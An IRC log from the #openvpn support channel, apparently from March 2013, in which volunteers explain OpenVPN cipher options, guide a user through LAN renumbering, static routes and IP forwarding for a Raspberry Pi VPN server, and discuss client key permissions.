[~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 22:19 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 22:20 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:26 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 22:27 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:28 -!- civillian [~nick@174.202.49.122-static.velocitynet.com.au] has joined #openvpn 22:28 < civillian> Hi all 22:28 < civillian> I'm getting this: Cipher algorithm 'DHE-RSA-AES256-SHA' not found (OpenSSL) 22:28 < civillian> Despite that being listed in openssl ciphers -v 22:28 < civillian> any tips? 22:30 < Poster> was openvpn compiled against a different version of openssl? 22:30 < civillian> These are debian packages, pre-built 22:32 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 22:32 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 22:33 < Poster> does tls-cipher EDH-RSA-DES-CBC3-SHA work? 22:33 < civillian> I'm just using the cipher directive, should i use tls-cipher? 22:33 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:33 < Poster> oh, try cipher 22:34 < civillian> doesn't work, same error Cipher algorithm 'EDH-RSA-DES-CBC3-SHA' not found (OpenSSL) 22:34 < Poster> is the client trying to force that? 22:35 < civillian> this is just me trying to restart the server process 22:35 < civillian> it won't start with these cipher settings 22:35 < Poster> maybe try both cipher and tls-cipher 22:35 < Poster> I've not encountered what you describe 22:36 < civillian> I used AES-256-CBC previously 22:36 < civillian> that was OK 22:36 < civillian> is there any issue staying with that one? 22:36 < Poster> not that I am aware of, though I am pretty oblivious to the different cipher types 22:37 < civillian> strangely this worked: 22:37 < civillian> cipher AES-256-CBC 22:37 < civillian> tls-cipher DHE-RSA-AES256-SHA 22:37 < civillian> both directives in there 22:38 < Poster> ok cool 22:39 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 22:39 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 22:40 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 22:40 -!- mode/#openvpn [+o vpnHelper] by ChanServ 22:40 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:41 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has quit [Quit: Linkinus - http://linkinus.com] 22:41 -!- mitz__ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.4.0] 22:41 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 22:43 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 22:44 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has quit [Quit: you see it's not the blood you spill that gets you what you want. it's the blood you share. your family. your friendships. your community. these are the most valuable things a man can have.] 22:44 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:44 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has joined #openvpn 22:50 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 22:50 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:55 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 246 seconds] 22:56 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:59 < pekster> civillian: You're confusing --cipher with --tls-cipher 23:00 < pekster> civillian: --show-tls shows you a list of "cipher-suites" used to negotiate the control thannel. --show-ciphers shows you options for the symmetric cipher used to secure the data channel. They're different components, and use different options 23:01 < pekster> (and related is --show-digests that shows you hashing digests that you can set for the --auth option) 23:02 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 23:03 -!- catsup [~d@64.111.123.163] has joined #openvpn 23:09 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 23:10 -!- catsup [~d@64.111.123.163] has joined #openvpn 23:15 -!- Wulf4 [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds] 23:16 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 23:18 -!- catsup [~d@64.111.123.163] has joined #openvpn 23:19 -!- epochwolf [~root@unaffiliated/epochwolf] has joined #openvpn 23:23 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds] 23:24 -!- catsup [~d@64.111.123.163] has joined #openvpn 23:29 -!- xbanux [~xbanux@triband-mum-59.182.163.226.mtnl.net.in] has joined #openvpn 23:29 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 264 seconds] 23:31 -!- catsup [~d@64.111.123.163] has joined #openvpn 23:33 -!- xbanux [~xbanux@triband-mum-59.182.163.226.mtnl.net.in] has quit [Read error: Connection reset by peer] 23:34 -!- xbanux [~xbanux@triband-mum-59.182.174.78.mtnl.net.in] has joined #openvpn 23:38 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 23:38 -!- catsup [~d@64.111.123.163] has joined #openvpn 23:43 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 245 seconds] 23:45 -!- catsup [~d@64.111.123.163] has joined #openvpn --- Day changed Fri Mar 22 2013 00:04 -!- xbanux [~xbanux@triband-mum-59.182.174.78.mtnl.net.in] has quit [Ping timeout: 260 seconds] 00:05 -!- xbanux [~xbanux@triband-mum-59.182.176.198.mtnl.net.in] has joined #openvpn 00:16 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 00:17 -!- mode/#openvpn [+o EugeneKay] by ChanServ 00:19 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds] 00:38 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 00:50 -!- catsup [d@64.111.123.163] has joined #openvpn 00:55 -!- catsup [d@64.111.123.163] has quit [Ping timeout: 252 seconds] 00:55 -!- catsup [d@64.111.123.163] has joined #openvpn 01:01 -!- catsup [d@64.111.123.163] has quit [Ping timeout: 264 seconds] 01:02 -!- catsup [d@64.111.123.163] has joined #openvpn 01:03 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 01:07 -!- catsup [d@64.111.123.163] has quit [Ping timeout: 256 seconds] 01:08 -!- catsup [d@64.111.123.163] has joined #openvpn 01:10 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 264 seconds] 01:12 -!- krzee [nobody@openvpn/community/support/krzee] has left #openvpn ["Leaving"] 01:12 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 01:12 -!- mode/#openvpn [+o krzee] by ChanServ 01:14 -!- catsup [d@64.111.123.163] has quit [Ping timeout: 256 seconds] 01:14 -!- catsup [d@64.111.123.163] has joined #openvpn 01:20 -!- catsup [d@64.111.123.163] has quit [Ping timeout: 255 seconds] 01:21 -!- catsup [d@64.111.123.163] has joined #openvpn 01:23 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: Leaving] 01:24 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 01:24 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 01:24 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 01:24 -!- mode/#openvpn [+o krzee] by ChanServ 01:26 -!- catsup [d@64.111.123.163] has quit [Ping timeout: 264 seconds] 01:27 -!- catsup [d@64.111.123.163] has joined #openvpn 01:32 -!- catsup [d@64.111.123.163] has quit [Ping timeout: 245 seconds] 01:33 -!- catsup [d@64.111.123.163] has joined #openvpn 01:39 -!- catsup [d@64.111.123.163] has quit [Ping timeout: 264 seconds] 01:40 -!- catsup [d@64.111.123.163] has joined #openvpn 01:43 -!- xbanux [~xbanux@triband-mum-59.182.176.198.mtnl.net.in] has quit [Ping timeout: 260 seconds] 01:45 -!- catsup [d@64.111.123.163] has quit [Ping timeout: 256 seconds] 01:46 -!- catsup [d@64.111.123.163] has joined #openvpn 01:52 -!- catsup [d@64.111.123.163] has quit [Ping timeout: 260 seconds] 01:52 -!- catsup [d@64.111.123.163] has joined #openvpn 01:59 -!- catsup [d@64.111.123.163] has quit [Read error: Connection reset by peer] 01:59 -!- catsup [d@64.111.123.163] has joined #openvpn 02:05 -!- catsup [d@64.111.123.163] has quit [Read error: Connection reset by peer] 02:05 -!- mode/#openvpn [+b *!*d@64.111.123.163] by krzee 02:10 -!- mitz__ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 02:11 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 260 seconds] 02:30 -!- Cpt-Oblivious is now known as Cpt-Oblivious|af 02:31 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has quit [Quit: ZNC - http://znc.sourceforge.net] 02:32 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn 02:32 * EugeneKay yawns 02:54 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has quit [Quit: ZNC - http://znc.sourceforge.net] 02:55 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn 02:59 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has quit [Read error: Connection reset by peer] 03:00 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn 03:02 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 03:04 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 03:17 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 03:21 -!- adasdasdasd [~root@sugest.me.what.to.do.with.wildfirevpn.com] has joined #openvpn 03:23 -!- cosmicgate [~root@sugest.me.what.to.do.with.wildfirevpn.com] has quit [Ping timeout: 255 seconds] 03:30 -!- cippaciong [~cippacion@95.236.151.104] has joined #openvpn 03:31 < cippaciong> hello 03:32 < cippaciong> I'm trying to understand how to properly use routing in openvpn 03:32 < cippaciong> but there are some thing I can't understand 03:34 < cippaciong> I have a LAN whit ip 192.168.0.X where I have the opnvpn server 03:34 < cippaciong> which has ips 192.168.0.9 ant tun0 10.8.0.1 03:35 < cippaciong> I use port 1194 and I forwarded the requests to this port to 192.168.0.9 using my router interface 03:35 < cippaciong> (a user-end netgear router) 03:36 < cippaciong> I can connect to the vpn and ping the server using 10.8.0.1 but not 192.168.0.9 03:37 < cippaciong> My goal is to be able to acces the LAN PCs thorugh the remote client 03:39 < cippaciong> the hard part is that I can't understand what has to be set on the server and what in the router interface 03:43 -!- Orbi [~opera@anon-163-206.vpn.ipredator.se] has joined #openvpn 03:52 -!- adasdasdasd [~root@sugest.me.what.to.do.with.wildfirevpn.com] has quit [Ping timeout: 256 seconds] 03:52 -!- tcamuso_ [~tcamuso@pool-71-161-82-88.cncdnh.east.myfairpoint.net] has quit [Read error: Operation timed out] 04:05 -!- brute11k [~brute@89.249.230.134] has joined #openvpn 04:06 < jzaw> cippaciong, use a non conflicting subnet on the remote lan ... ie 192.168.1.x 04:07 < jzaw> and set up routes so any host at the server end knows how to reach any host at the client end 04:07 < jzaw> and vice versa 04:11 < cippaciong> jzaw: actually I don't need server lan hosts to reach client lan hosts 04:11 < cippaciong> I only need client to reach server lan hosts 04:12 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Ping timeout: 258 seconds] 04:15 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 04:23 < pppingme> cippaciong did you get everything worked out? 04:24 < cippaciong> nope 04:25 < pppingme> are you doing tap or tun interfaces on the vpn? 04:25 < cippaciong> tun 04:25 < pppingme> and your goal is to reach stuff on your network from the vpn clients, right? 04:25 < cippaciong> exactly 04:26 < pppingme> ok, I'm going to guess there's two adjustments you need to make, but let me understand a couple things first.. 04:26 < pppingme> you're using the default 10.8.x.x ip range for vpn clients? 04:26 < cippaciong> yes 04:26 < pppingme> and whats the ip range on your lan? 04:27 < cippaciong> 192.168.0.X 04:27 < cippaciong> but I have dhcp enabled only from 192.168.30 to .255 04:27 < pppingme> ok, I would HIGHLY recommend you change that, but we can work with that if its a problem. 04:27 < cippaciong> from 1 to 30 I use static ips 04:28 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out] 04:28 < cippaciong> I'm all ears 04:28 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 04:28 < pppingme> the reason is, if you take your laptop to another place that uses 192.168.0.x, it can cause confusion for your laptop 04:28 < pppingme> but thats not one of the two changes I would recommend.. 04:28 < pppingme> wait, I phrased that poorly... 04:28 < pppingme> thats not one of the two changes we need to make... 04:29 < pppingme> so do you want to "fix" that before we go further or leave it as it is for now? 04:29 -!- Cpt-Oblivious|af [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 04:29 < cippaciong> how should I fix it? 04:30 < pppingme> how well do you know your router? 04:30 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 04:30 < cippaciong> average 04:30 < cippaciong> I mean, do you want me to change the ip class for my lan? 04:30 -!- mitz__ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 04:31 < pppingme> class is a bad word.. 04:31 < cippaciong> wops 04:31 < pppingme> but the goal is to move away from the 192.168.x.x ranges 04:31 < cippaciong> towards what? 04:31 < cippaciong> 10.x.x.x? 04:32 < pppingme> If you're using 10.8.0.x on the vpn, then I'd probably use somethign like 10.8.10.x with a netmask of 255.255.255.0 on the lan, so your router would be 10.8.10.1 and your static ip machines would be 10.8.10.2-30 like they are now, and your dhcp starts above that and goes as far as you want 04:33 < pppingme> you're doing dhcp on the router, right? 04:34 < cippaciong> yes 04:34 < pppingme> ok 04:34 < jzaw> this is fun .... itll just give you a suggestion 04:34 < jzaw> http://scarydevilmonastery.net/subnet.cgi 04:34 <@vpnHelper> Title: subnet suggestor (at scarydevilmonastery.net) 04:34 < pppingme> does everything I just said make sense? 04:35 < jzaw> refresh that page if you dont like the suggested subnet 04:36 <@EugeneKay> If you really want to avoid subnet clashes, use something out of 172.16.0.0/12 04:36 < pppingme> I've come across more 172.16/12 networks than 10/8 networks, I duno if thats a fluke or more common sense net-admins.. 04:37 * jzaw hopes its the latter ;) 04:37 < pppingme> I guess I only work with smart people :) 04:37 < pppingme> when I do come across 10.x.x.x networks, they are almost always using an 8 bit mask.. and yes, I always fix that 04:39 <@EugeneKay> Using the maximum mask size is so stupid. 04:40 -!- cippaciong [~cippacion@95.236.151.104] has quit [Read error: Operation timed out] 04:40 < pppingme> with that argument you could say most home users should use /29 or /28, maybe /27 if they have a lot of stuff 04:40 <@EugeneKay> Minimum mask size is also stupid 04:41 < pppingme> I'll admit for single networks I always use a /24 mostly out of lazyness 04:41 <@EugeneKay> I reserve a /16 out of 10/8 for each of my "sites"; each LAN gets a /20; and then each static box gets a /28. It's a bit oversized, but it has it's merits 04:41 <@EugeneKay> DHCP gets its own /24, which means my rDNS zones can be "clean" except for that one. 04:41 < jzaw> im curious what my Polish cable operator is doing when i have a pub ip and the 3rd hop i 04:42 < jzaw> is 04:42 < jzaw> 3. 172.20.0.4 0.0% 8 16.4 17.9 14.4 23.2 2.7 04:42 <@EugeneKay> And for boxes which need >1 IP I don't have to make them non-contiguous. 04:42 < pppingme> they have a router that doesn't have a public ip for whatever erason 04:42 <@EugeneKay> It's possible to route traffic carrying public IPs over RFC1918 04:42 < jzaw> yeah 04:42 <@EugeneKay> It saves you a few addresses 04:43 < pppingme> if a box doesn't need to be directly addressed from the 'net (even if it does carry traffic) there's technical need for a public ip, although many would argue thats wrong 04:43 < jzaw> unnecessary in the eu id have said 04:43 < pppingme> wrong being bad practice, not wrong in a way that breaks things 04:45 < jzaw> being as i know who runs the network id say they do a lot of bad practice 04:45 -!- C-S-B [~C-S-B@86.171.238.234] has quit [Ping timeout: 245 seconds] 04:55 -!- C-S-B [~C-S-B@host86-144-219-44.range86-144.btcentralplus.com] has joined #openvpn 04:56 -!- cippaciong [~cippacion@95.236.151.104] has joined #openvpn 04:59 < pppingme> you're back 05:00 -!- C-S-B [~C-S-B@host86-144-219-44.range86-144.btcentralplus.com] has quit [Ping timeout: 245 seconds] 05:01 -!- cippaciong [~cippacion@95.236.151.104] has quit [Read error: Operation timed out] 05:02 <@EugeneKay> No I'm not. 05:08 -!- dazo_afk is now known as dazo 05:13 -!- cippaciong [~cippacion@95.236.151.104] has joined #openvpn 05:13 < cippaciong> pppingme: I should be back :) 05:18 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 05:19 -!- C-S-B [~C-S-B@craigsblackie.broker.freenet6.net] has joined #openvpn 05:26 -!- xbanux [~xbanux@triband-mum-59.182.133.84.mtnl.net.in] has joined #openvpn 05:35 -!- C-S-B [~C-S-B@craigsblackie.broker.freenet6.net] has quit [Ping timeout: 245 seconds] 05:37 -!- Denial [~Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 05:40 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 05:40 -!- tcamuso_ [tcamuso@nat/redhat/x-hljszfqzgrogsjjn] has joined #openvpn 06:07 -!- Orbi [~opera@anon-163-206.vpn.ipredator.se] has left #openvpn [] 06:12 < pppingme> cippaciong hey 06:12 < pppingme> just saw ya 06:13 < cippaciong> I'm here 06:13 < pppingme> did you get your local network renumbered to the new range? 06:14 < cippaciong> yes 06:14 < cippaciong> 10.8.10.1 is the router 06:14 < cippaciong> .2 to .30 static 06:14 < cippaciong> dhcp others 06:14 < pppingme> sweet 06:15 < pppingme> whats the ip of the openvpn server? 06:15 < cippaciong> 10.8.10.9 06:15 < pppingme> ok, and you've done the portforward? 06:15 < cippaciong> yes 06:15 < cippaciong> I'm using 1194 06:15 < pppingme> ok, one last thing you should do on your router.. 06:16 < pppingme> there's a place to add static routes 06:16 < cippaciong> yep 06:16 < pppingme> you need to add a route for 10.8.0.0/24 (mask 255.255.255.0) and make its next hop or destination be the vpn server 10.8.10.9 06:17 < cippaciong> 10.8.0.0 because is the ip range I choosed in the server instance right? 06:17 < cippaciong> in server.conf 06:18 < pppingme> right (you haven't chagned that, right?) 06:18 < cippaciong> right 06:18 < cippaciong> my router config page says 06:19 < cippaciong> "destination ip" 06:19 < cippaciong> I suppose is 10.8.10.9 06:19 < pppingme> that would be the 10.8.10.9 06:19 < pppingme> right 06:19 < cippaciong> subnet 06:19 < cippaciong> 255.255.255.0 06:19 < pppingme> right 06:19 < cippaciong> and then gateway ip 06:19 < pppingme> oops, wait, I mis-stated.. 06:19 < pppingme> destination ip would be 10.8.0.0 06:19 < pppingme> subnetmask would be 255.255.255.0 06:20 -!- cosmicgate [~root@sugest.me.what.to.do.with.wildfirevpn.com] has joined #openvpn 06:20 < pppingme> and gateway would be 10.8.10.9 06:20 < pppingme> my bad.. 06:20 < cippaciong> ok 06:20 < cippaciong> makes more sense 06:20 < pppingme> I mis-read what you said.. 06:20 -!- cosmicgate is now known as Guest79066 06:20 < cippaciong> and then I have another field 06:20 < cippaciong> called "Metric" 06:20 < pppingme> leave it at default, if it forces you to put something in, put a 1 06:20 -!- Guest79066 [~root@sugest.me.what.to.do.with.wildfirevpn.com] has left #openvpn [] 06:20 < cippaciong> ok 06:21 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 06:21 < cippaciong> mmm 06:22 < cippaciong> In the guide says that metric shuold be in a range of 1-15 06:22 < pppingme> mmm?? 06:22 < cippaciong> but if I put 1 06:22 < pppingme> your router guide? you're setting it to 1 if it doesn't have a default 06:22 < cippaciong> yes, I have a brief guide in a lateral panel 06:22 < cippaciong> but if I set 1 it says 06:23 < cippaciong> "not between 2 - 15" 06:23 < pppingme> hmm.. ok, use 2.. 06:23 < cippaciong> worked 06:24 < pppingme> you haven't already added a route for 10.8.0.0 for another reason have you? 06:24 < cippaciong> oh, there was also an option to make it private 06:24 < cippaciong> I left it unchecked 06:24 < pppingme> hmm.. not even sure what that would do, must be some vendor specific thing 06:24 < cippaciong> it's to limit the access to LAN pc only 06:26 < pppingme> ok, I probably wouldn't check it 06:26 < cippaciong> ok 06:26 < pppingme> is your vpn server a linux box? 06:26 < cippaciong> yes 06:26 < cippaciong> is archlinux-arm 06:26 < cippaciong> running on raspberry 06:26 < pppingme> there's a file /etc/sysctl.conf 06:27 -!- C-S-B [~C-S-B@host86-171-109-108.range86-171.btcentralplus.com] has joined #openvpn 06:27 < pppingme> there's probably a line in it that says net.ipv4.ip_forward 06:27 < pppingme> does it end with =0 or =1 ? 06:27 < cippaciong> 0 06:27 < pppingme> ok, change that to 1.. 06:27 < cippaciong> ok 06:28 < cippaciong> are this settings global? 06:28 < pppingme> then run sysctl -p 06:28 < pppingme> for that box, yeah 06:28 < cippaciong> because I use netcfg to connect to the network 06:28 < cippaciong> an archlinux tool 06:28 < pppingme> otherwise you won't be able to see other hosts on the network 06:28 < pppingme> netcfg won't touch that setting 06:28 < cippaciong> ok 06:28 < pppingme> at least not the last version I saw.. 06:29 < cippaciong> done 06:29 < pppingme> ok, one last detail, in your server.conf or whatever you called it (the openvpn.conf file) add a line that says: 06:30 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 06:30 < pppingme> push route 10.8.10.0 255.255.255.0 06:31 < pppingme> after that, everything should be routable 06:31 < pppingme> (unless you have some firewall rules on your vpn server thats barfing it) 06:32 < cippaciong> no, I'm using the router built in firewall 06:32 < cippaciong> I already had that line 06:32 < cippaciong> push "route 10.8.10.0 255.255.255.0" 06:32 < pppingme> that works.. 06:33 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 06:33 < cippaciong> so this should be all, right? 06:33 < pppingme> then you're done.. now test.. a vpn client should get a 10.8.0.x ip and should be able to ping anything on the 10.8.10.x network 06:33 < pppingme> yep 06:33 < cippaciong> can I test it in the same network? 06:34 < pppingme> not a good idea, test from outside if you can 06:34 < cippaciong> let's try then =) 06:34 < cippaciong> oh ok 06:34 < pppingme> the reason is the same as why I told you its a bad idea to leave your base network at 192.168.0.x 06:35 < cippaciong> ok then 06:35 < cippaciong> I'll try on another network 06:35 < cippaciong> well.. 06:36 < cippaciong> thanks a lot pppingme, really 06:36 < cippaciong> this afternoon I'll test it and then I'll let you know :D 06:43 -!- Orbi [~opera@anon-163-206.vpn.ipredator.se] has joined #openvpn 07:08 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Quit: Saliendo] 07:09 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 07:09 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Read error: Connection reset by peer] 07:16 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 07:16 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 07:20 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 07:20 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 07:57 -!- xbanux [~xbanux@triband-mum-59.182.133.84.mtnl.net.in] has quit [Read error: Connection reset by peer] 07:58 -!- xbanux [~xbanux@triband-mum-59.182.157.239.mtnl.net.in] has joined #openvpn 08:07 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Quit: I quit] 08:08 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 08:12 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds] 08:14 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 08:16 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 08:18 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has joined #openvpn 08:20 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 246 seconds] 08:26 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 08:26 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Changing host] 08:26 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 08:27 * pyrobisqit is back (gone 00:07:04) 08:38 -!- cippacio1 [~cippacion@ppp-108-13.21-151.libero.it] has joined #openvpn 08:39 < cippacio1> pppingme: routing works perfectly 08:39 < cippacio1> thank you 08:40 < cippacio1> I'm on another network and I can ping the server with both 10.8.0.1 and 10.8.10.9 08:41 < cippacio1> next step is connecting to the samba share ;) 08:47 -!- erry [erry@freenode/staff/erry] has left #openvpn [] 08:58 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 252 seconds] 08:58 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 09:08 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 245 seconds] 09:35 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has quit [Quit: Leaving...] 09:36 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 09:59 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 10:01 -!- pyrobisqit_ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 10:02 < cippacio1> what should be the correct owner and permissions for a client.key? 10:02 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Ping timeout: 245 seconds] 10:03 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:04 -!- pyrobisqit_ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Client Quit] 10:05 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 10:12 -!- Cpt-Oblivious|af [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 10:30 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 10:35 -!- epochwolf [~root@unaffiliated/epochwolf] has left #openvpn ["Textual IRC Client: http://www.textualapp.com/"] 10:38 -!- xbanux [~xbanux@triband-mum-59.182.157.239.mtnl.net.in] has quit [Read error: Connection reset by peer] 10:38 -!- xbanux [~xbanux@triband-mum-59.182.131.162.mtnl.net.in] has joined #openvpn 10:41 < dropje> cippacio1: client.key should only be available to the client 10:43 < cippacio1> dropje: ok, but talking about linux clients 10:44 < cippacio1> should it be owned by root or by normal user? 11:02 -!- raidz_away is now known as raidz 11:02 < dropje> cippacio1: you need to run the openvpn binary initially as root, so i think only root needs to be able to read it 11:03 <@EugeneKay> Technically not, but it's a good simplification 11:03 <@EugeneKay> You need to be able to run it as a user allowed to control the tun/tap device and use `ip` ;-) 11:04 < cippacio1> I'm asking because I'd like to try to use the NetworkManager gui to connect to the VPN 11:05 < cippacio1> but if the client.key is owned by root then I can't select it when aske 11:08 < cippacio1> if I change the owner of the key to my default user, do I break security? 11:10 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 11:11 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has joined #openvpn 11:19 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 252 seconds] 11:20 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 11:20 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has quit [Ping timeout: 258 seconds] 11:20 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has joined #openvpn 11:21 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 256 seconds] 11:27 -!- cippacio1 [~cippacion@ppp-108-13.21-151.libero.it] has quit [Ping timeout: 256 seconds] 11:28 -!- cippacio1 [~cippacion@95.236.151.104] has joined #openvpn 11:30 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds] 11:34 -!- cippacio1 [~cippacion@95.236.151.104] has quit [Quit: WeeChat 0.4.0] 12:00 -!- dazo is now known as dazo_afk 12:03 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 12:07 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 12:12 -!- speed_racer8 [~speed_rac@h4.185.30.71.dynamic.ip.windstream.net] has joined #openvpn 12:12 -!- benkay [~benkay@67.50.19.230] has joined #openvpn 12:21 < benkay> so I'm looking at the redirect flow 12:21 < benkay> er, troubleshooting diagram 12:21 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has quit [Ping timeout: 272 seconds] 12:21 < benkay> this assumes that I'm connected to the vpn while running these tests, correct? 12:31 -!- Orbi [~opera@anon-163-206.vpn.ipredator.se] has quit [Quit: Orbi] 12:31 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 12:35 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 12:43 -!- cippaciong [~cippacion@95.236.151.104] has quit [Quit: WeeChat 0.4.0] 12:50 -!- mitz_ 